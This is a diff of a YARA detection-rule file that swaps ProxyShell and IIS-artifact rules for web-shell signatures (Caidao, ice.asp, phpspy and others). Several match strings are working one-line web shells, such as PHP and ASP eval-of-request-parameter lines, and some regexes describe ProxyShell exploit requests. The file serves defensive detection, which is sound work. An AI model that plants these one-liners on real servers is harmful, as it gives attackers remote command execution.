 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\ERAWTFOS" fullword ascii
-		$x1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
-		$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)" fullword ascii
-		$x3 = "%d*%u%s" fullword ascii
-		$x4 = "%s %s:%d" fullword ascii
-		$x5 = "Mnopqrst Vwxyabcde Ghijklm Opqrstuv Xya" fullword ascii
+		$s0 = "<?php ${${eval($_POST[ice])}};?>" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s0 and 2 of ( $x* )
+		all of them
 }
-rule SIGNATURE_BASE_Gen_Excel_Xor_Obfuscation_Velvetsweatshop : FILE
+rule SIGNATURE_BASE_Webshell_Caidao_Shell_Mdb
 {
 	meta:
-		description = "Detects XOR encryption (c. 2003) in Excel file formats"
-		author = "@JohnLaTwc"
-		id = "8a16105c-4f43-5a35-941c-6ee9593b039c"
-		date = "2020-10-09"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/BouncyHat/status/1308896366782042113"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_excel_xor_obfuscation_velvetsweatshop.yar#L3-L25"
+		description = "Web Shell - file mdb.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L479-L492"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c38d56199d34adfc98d8032321239ab20c6eaa8abcafd56f8e1cf24fd3a4094f"
-		score = 75
+		hash = "fbf3847acef4844f3a0d04230f6b9ff9"
+		logic_hash = "89f7692acd754992f9379b9b4661a01d6ab95cb85a3c2699928aa5ed3a3ac8c5"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "da1999c23ee2dae02a169fd2208b9766cb8f046a895f5f52bed45615eea94da0"
-		hash2 = "14a32b8a504db3775e793be59d7bd5b584ea732c3ca060b2398137efbfd18d5a"
-		hash3 = "dd3e89e7bde993f6f1b280f2bf933a5cc2797f4e8736aed4010aaf46e9854f23"
-		hash4 = "4e40253b382b20e273edf82362f1c89e916f7ab8d3c518818a76cb6127d4e7c2"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$olemarker = { D0 CF 11 E0 A1 B1 1A E1 00 00 00 }
-		$FilePass_XOR_Obfuscation_VelvetSweatshop = { 2F 00 06 00 00 00 59 B3 0A 9A }
+		$s1 = "<% execute request(\"ice\")%>a " fullword
 
 	condition:
-		uint32( 0 ) == 0xe011cfd0 and filesize < 400KB and $olemarker at 0 and $FilePass_XOR_Obfuscation_VelvetSweatshop
+		all of them
 }
-rule SIGNATURE_BASE_EXPL_Exchange_Proxyshell_Failed_Aug21_1 : SCRIPT
+rule SIGNATURE_BASE_Webshell_Jsp_Guige
 {
 	meta:
-		description = "Detects ProxyShell exploitation attempts in log files"
+		description = "Web Shell - file guige.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b849042-8918-5322-a35a-2165d4b541d5"
-		date = "2021-08-08"
-		modified = "2021-08-09"
-		reference = "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L1-L15"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L493-L506"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "690e74633ac8671727fe47f6398e536c1b7a4ac469d27d3f7507c75e175716bd"
-		score = 50
-		quality = 60
-		tags = "SCRIPT"
+		hash = "2c9f2dafa06332957127e2c713aacdd2"
+		logic_hash = "9d71095b5c709dfdd8b5fcebcaa4493d9c93e841e85cda2e2255e0c15ea83659"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xr1 = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(powershell|mapi\/nspi|EWS\/|X-Rps-CAT)[^\n]{1,400}401 0 0/ nocase ascii
-		$xr3 = /Email=autodiscover\/autodiscover\.json[^\n]{1,400}401 0 0/ nocase ascii
+		$s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_EXPL_Exchange_Proxyshell_Successful_Aug21_1 : SCRIPT
+rule SIGNATURE_BASE_Webshell_Phpspy2010
 {
 	meta:
-		description = "Detects successful ProxyShell exploitation attempts in log files"
+		description = "Web Shell - file phpspy2010.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8c11cd1a-6d3f-5f29-af61-17179b01ca8b"
-		date = "2021-08-08"
-		modified = "2025-03-21"
-		reference = "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L17-L33"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L507-L522"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "06ab609a8efe3b36b6356a9cf7b7b11b2fc2a556ec1df6995008a9df86b3fcee"
-		score = 65
-		quality = 58
-		tags = "SCRIPT"
+		hash = "14ae0e4f5349924a5047fed9f3b105c5"
+		logic_hash = "b3acef196b30cf9afe24c81860bedff69fc5652c514aa36aba85d16b12bcc432"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xr1a = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(powershell|X-Rps-CAT)/ nocase ascii
-		$xr1b = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(mapi\/nspi|EWS\/)[^\n]{1,400}(200|302) 0 0/
-		$xr2 = /autodiscover\/autodiscover\.json[^\n]{1,60}&X-Rps-CAT=/ nocase ascii
-		$xr3 = /Email=autodiscover\/autodiscover\.json[^\n]{1,400}200 0 0/ nocase ascii
+		$s3 = "eval(gzinflate(base64_decode("
+		$s5 = "//angel" fullword
+		$s8 = "$admin['cookiedomain'] = '';" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Aug21_2 : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Ice
 {
 	meta:
-		description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be PST), size and content"
+		description = "Web Shell - file ice.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a351a466-695e-570e-8c7f-9c6c0534839c"
-		date = "2021-08-13"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-11-03"
-		reference = "https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-are-getting-hacked-via-proxyshell-exploits/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L35-L48"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L523-L536"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4ede197d482f0a9e553ba857b5049e7b7405e3df92460e19418fa0653c844982"
-		score = 75
+		hash = "d141e011a92f48da72728c35f1934a2b"
+		logic_hash = "524419e802d3cb6ac310565af22ec28044984aa4b1b2ee1cfbd292afd071709c"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Page Language=" ascii nocase
+		$s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC"
 
 	condition:
-		uint32( 0 ) == 0x4e444221 and filesize < 2MB and $s1
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Aug21_3 : FILE
+rule SIGNATURE_BASE_Webshell_Drag_System
 {
 	meta:
-		description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be DER), size and content"
-		author = "Max Altgelt"
-		id = "a7bca62b-c8f1-5a38-81df-f3d4582a590b"
-		date = "2021-08-23"
+		description = "Web Shell - file system.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-11-03"
-		reference = "https://twitter.com/gossithedog/status/1429175908905127938?s=12"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L50-L64"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L537-L550"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f071aaa8918b359f786f2ac7447eeaedb5a6fca9e0a0c0e8820e011244424503"
-		score = 75
+		hash = "15ae237cf395fb24cf12bff141fb3f7c"
+		logic_hash = "8ea8d9d64521f47f1396e4f4d6c8f4a71fa1a643799ec408e1d2e0f255dc4996"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Page Language=" ascii nocase
+		$s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_"
 
 	condition:
-		uint16( 0 ) == 0x8230 and filesize < 10KB and $s1
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Sep21_1 : FILE
+rule SIGNATURE_BASE_Webshell_Darkblade1_3_Asp_Indexx
 {
 	meta:
-		description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be PST) and base64 decoded request"
-		author = "Tobias Michalski"
-		id = "d0d23e17-6b6a-51d1-afd9-59cc2404bcd8"
-		date = "2021-09-17"
+		description = "Web Shell - file indexx.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-11-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L66-L80"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L551-L564"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "219468c10d2b9d61a8ae70dc8b6d2824ca8fbe4e53bbd925eeca270fef0fd640"
-		logic_hash = "233ec15dff8da5f2beaa931eb06849aa37e548947c1068d688a1695d977605d8"
-		score = 75
+		hash = "b7f46693648f534c2ca78e3f21685707"
+		logic_hash = "57cfe09d53d42ee9d909a3894b8a3362209c1972c7d96ae5fdc61681c2998a89"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s = ".FromBase64String(Request["
+		$s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou"
 
 	condition:
-		uint32( 0 ) == 0x4e444221 and any of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_IIS_Config_Proxyshell_Artifacts : FILE
+rule SIGNATURE_BASE_Webshell_Phpshell3
 {
 	meta:
-		description = "Detects virtual directory configured in IIS pointing to a ProgramData folder (as found in attacks against Exchange servers in August 2021)"
+		description = "Web Shell - file phpshell3.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21888fc0-82c6-555a-9320-9cbb8332a843"
-		date = "2021-08-25"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-11-03"
-		reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L82-L105"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L565-L580"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a4557694629448d258b8b2fefc278e059217560e7a0ec3279863a16fb9b3989c"
-		score = 90
+		hash = "76117b2ee4a7ac06832d50b2d04070b8"
+		logic_hash = "868b1b69fab3ec6fcfa15557075f313f4af0ec9cd15f41bb9dcc9bc26fc17f93"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "<site name=" ascii
-		$a2 = "<sectionGroup name=\"system.webServer\">" ascii
-		$sa1 = " physicalPath=\"C:\\ProgramData\\COM" ascii
-		$sa2 = " physicalPath=\"C:\\ProgramData\\WHO" ascii
-		$sa3 = " physicalPath=\"C:\\ProgramData\\ZING" ascii
-		$sa4 = " physicalPath=\"C:\\ProgramData\\ZOO" ascii
-		$sa5 = " physicalPath=\"C:\\ProgramData\\XYZ" ascii
-		$sa6 = " physicalPath=\"C:\\ProgramData\\AUX" ascii
-		$sa7 = " physicalPath=\"C:\\ProgramData\\CON\\" ascii
-		$sb1 = " physicalPath=\"C:\\Users\\All Users\\" ascii
+		$s2 = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];"
+		$s5 = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna"
+		$s7 = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword
 
 	condition:
-		filesize < 500KB and all of ( $a* ) and 1 of ( $s* )
+		2 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Exploitation_Aug21_1 : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Hsxa
 {
 	meta:
-		description = "Detects unknown malicious loaders noticed in August 2021"
+		description = "Web Shell - file hsxa.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1fa563fc-c91c-5f4e-98f1-b895e1acb4f4"
-		date = "2021-08-25"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-11-03"
-		reference = "https://twitter.com/VirITeXplorer/status/1430206853733097473"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L107-L119"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L581-L594"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8a2417bb85c7f91d98143d2f4c26d30416b3a01ba8abc1445ccfae5609825b4d"
-		score = 90
+		hash = "d0e05f9c9b8e0b3fa11f57d9ab800380"
+		logic_hash = "7f79b66d87f638bc09ee576de4dc4a8c5b1da7c406d318eeff7a4221c35d2313"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = ");eval/*asf" ascii
+		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
 
 	condition:
-		filesize < 600KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Aug15 : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Utils
 {
 	meta:
-		description = "Webshells iisstart.aspx and Logout.aspx"
-		author = "Moritz Oettle"
-		id = "b1e6c0f3-787f-59b8-8123-4045522047ca"
-		date = "2021-09-04"
+		description = "Web Shell - file utils.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-11-03"
-		reference = "https://github.com/hvs-consulting/ioc_signatures/tree/main/Proxyshell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L121-L152"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L595-L609"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "46c37f1d80c777acafa6ee64d7df18a6b94768f4463d9196027111a84a63a24f"
-		score = 75
+		hash = "9827ba2e8329075358b8e8a53e20d545"
+		logic_hash = "90a5b64e59306bdffc5a89f5d86a2dc7a17669021d863e2a5ecea13d65c19053"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$g1 = "language=\"JScript\"" ascii
-		$g2 = "function getErrorWord" ascii
-		$g3 = "errorWord" ascii
-		$g4 = "Response.Redirect" ascii
-		$g5 = "function Page_Load" ascii
-		$g6 = "runat=\"server\"" ascii
-		$g7 = "Request[" ascii
-		$g8 = "eval/*" ascii
-		$s1 = "AppcacheVer" ascii
-		$s3 = "LaTkWfI64XeDAXZS6pU1KrsvLAcGH7AZOQXjrFkT816RnFYJQR" ascii
-		$fp1 = "<input type=\"submit\" Value=\"Refresh This Page\""
+		$s0 = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
 
 	condition:
-		filesize < 1KB and ( 1 of ( $s* ) or 4 of ( $g* ) ) and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_Mailbox_Export_PST_Proxyshell_Aug26 : FILE
+rule SIGNATURE_BASE_Webshell_Asp_01
 {
 	meta:
-		description = "Webshells generated by an Mailbox export to PST and stored as aspx: 570221043.aspx 689193944.aspx luifdecggoqmansn.aspx"
-		author = "Moritz Oettle"
-		id = "6aea414f-d27c-5202-84f8-b8620782fc90"
-		date = "2021-09-04"
+		description = "Web Shell - file 01.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-11-03"
-		reference = "https://github.com/hvs-consulting/ioc_signatures/tree/main/Proxyshell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L154-L180"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L610-L623"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "07acbf74a4bf169fc128cd085759f33e89917e217703b3c6557ba5f954822fd4"
-		score = 85
+		hash = "61a687b0bea0ef97224c7bd2df118b87"
+		logic_hash = "e057800013a9a8f4c3ecbe4e27c14e904700548e6ad9dc1f00313c7a3de7fd2d"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "!BDN"
-		$g1 = "Page language=" ascii
-		$g2 = "<%@ Page" ascii
-		$g3 = "Request.Item[" ascii
-		$g4 = "\"unsafe\");" ascii
-		$g5 = "<%eval(" ascii
-		$g6 = "script language=" ascii
-		$g7 = "Request[" ascii
-		$s1 = "gold8899" ascii
-		$s2 = "exec_code" ascii
-		$s3 = "orangenb" ascii
+		$s0 = "<%eval request(\"pass\")%>" fullword
 
 	condition:
-		filesize < 500KB and $x1 at 0 and ( 1 of ( $s* ) or 3 of ( $g* ) )
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_IIS_Config_Proxyshell_Artifacts : FILE
+rule SIGNATURE_BASE_Webshell_Asp_404
 {
 	meta:
-		description = "Detects suspicious virtual directory configured in IIS pointing to a ProgramData folder (as found in attacks against Exchange servers in August 2021)"
+		description = "Web Shell - file 404.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bde65d9e-b17d-5746-8d29-8419363d0511"
-		date = "2021-08-25"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-11-03"
-		reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L186-L201"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L624-L637"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f2822a2b762c8e683c5e3a3f4a8232faa187b9a36182ea71e5286158b0e8115c"
+		hash = "d9fa1e8513dbf59fa5d130f389032a2d"
+		logic_hash = "3db951af36ed3d08bc10b4c3fc2e67481f005580fb76f66b6ec5789ed6e2efdb"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "<site name=" ascii
-		$a2 = "<sectionGroup name=\"system.webServer\">" ascii
-		$s1 = " physicalPath=\"C:\\ProgramData\\" ascii
+		$s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2"
 
 	condition:
-		filesize < 500KB and all of ( $a* ) and 1 of ( $s* )
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_IIS_Config_Virtualdir : FILE
+rule SIGNATURE_BASE_Webshell_Webshell_Cnseay02_1
 {
 	meta:
-		description = "Detects suspicious virtual directory configured in IIS pointing to a User folder"
+		description = "Web Shell - file webshell-cnseay02-1.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cfe5ca5e-a0cc-5f60-84d2-1b0538e999c7"
-		date = "2021-08-25"
-		modified = "2022-09-17"
-		reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L203-L223"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L638-L651"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0b9be085957f368bc1890c42e3f1e8b974eed8c77ecb4d2ba6add4d877a9b488"
-		score = 60
+		hash = "95fc76081a42c4f26912826cb1bd24b1"
+		logic_hash = "9950fb7c26dfb25665093dbcf5c4a9dcf65466783509a3caa11c2c96d177d855"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "<site name=" ascii
-		$a2 = "<sectionGroup name=\"system.webServer\">" ascii
-		$s2 = " physicalPath=\"C:\\Users\\" ascii
-		$fp1 = "Microsoft.Web.Administration" wide
-		$fp2 = "<virtualDirectory path=\"/\" physicalPath=\"C:\\Users\\admin\\"
+		$s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU"
 
 	condition:
-		filesize < 500KB and all of ( $a* ) and 1 of ( $s* ) and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_ASPX_Possibledropperartifact_Aug21 : FILE
+rule SIGNATURE_BASE_Webshell_Php_Fbi
 {
 	meta:
-		description = "Detects an ASPX file with a non-ASCII header, often a result of MS Exchange drop techniques"
-		author = "Max Altgelt"
-		id = "52016598-74a1-53d6-812a-40b078ba0bb9"
-		date = "2021-08-23"
+		description = "Web Shell - file fbi.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-11-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L225-L255"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L652-L665"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7e2fc61897ed859d5165aca7360d8a27891f842a7a8e4894af3926427ac95ceb"
-		score = 60
+		hash = "1fb32f8e58c8deb168c06297a04a21f1"
+		logic_hash = "de8584ae83ee3e23f4ce00ccd73f75b4568d6a4544af45b83784a9a0c34d42e3"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Page Language=" ascii nocase
-		$fp1 = "Page Language=\"java\"" ascii nocase
+		$s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo"
 
 	condition:
-		filesize < 500KB and not uint16( 0 ) == 0x4B50 and not uint16( 0 ) == 0x6152 and not uint16( 0 ) == 0x8b1f and not uint16( 0 ) == 0x5A4D and not uint16( 0 ) == 0xCFD0 and not uint16( 0 ) == 0xC3D4 and not uint16( 0 ) == 0x534D and all of ( $s* ) and not 1 of ( $fp* ) and ( ( ( uint8( 0 ) < 0x20 or uint8( 0 ) > 0x7E ) and uint8( 0 ) != 0x9 and uint8( 0 ) != 0x0D and uint8( 0 ) != 0x0A and uint8( 0 ) != 0xEF ) or ( ( uint8( 1 ) < 0x20 or uint8( 1 ) > 0x7E ) and uint8( 1 ) != 0x9 and uint8( 1 ) != 0x0D and uint8( 1 ) != 0x0A and uint8( 1 ) != 0xBB ) or ( ( uint8( 2 ) < 0x20 or uint8( 2 ) > 0x7E ) and uint8( 2 ) != 0x9 and uint8( 2 ) != 0x0D and uint8( 2 ) != 0x0A and uint8( 2 ) != 0xBF ) or ( ( uint8( 3 ) < 0x20 or uint8( 3 ) > 0x7E ) and uint8( 3 ) != 0x9 and uint8( 3 ) != 0x0D and uint8( 3 ) != 0x0A ) or ( ( uint8( 4 ) < 0x20 or uint8( 4 ) > 0x7E ) and uint8( 4 ) != 0x9 and uint8( 4 ) != 0x0D and uint8( 4 ) != 0x0A ) or ( ( uint8( 5 ) < 0x20 or uint8( 5 ) > 0x7E ) and uint8( 5 ) != 0x9 and uint8( 5 ) != 0x0D and uint8( 5 ) != 0x0A ) or ( ( uint8( 6 ) < 0x20 or uint8( 6 ) > 0x7E ) and uint8( 6 ) != 0x9 and uint8( 6 ) != 0x0D and uint8( 6 ) != 0x0A ) or ( ( uint8( 7 ) < 0x20 or uint8( 7 ) > 0x7E ) and uint8( 7 ) != 0x9 and uint8( 7 ) != 0x0D and uint8( 7 ) != 0x0A ) )
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_Proxyshell_Exploitation_Nov21_1
+rule SIGNATURE_BASE_Webshell_B374Kphp_B374K
 {
 	meta:
-		description = "Detects webshells dropped by DropHell malware"
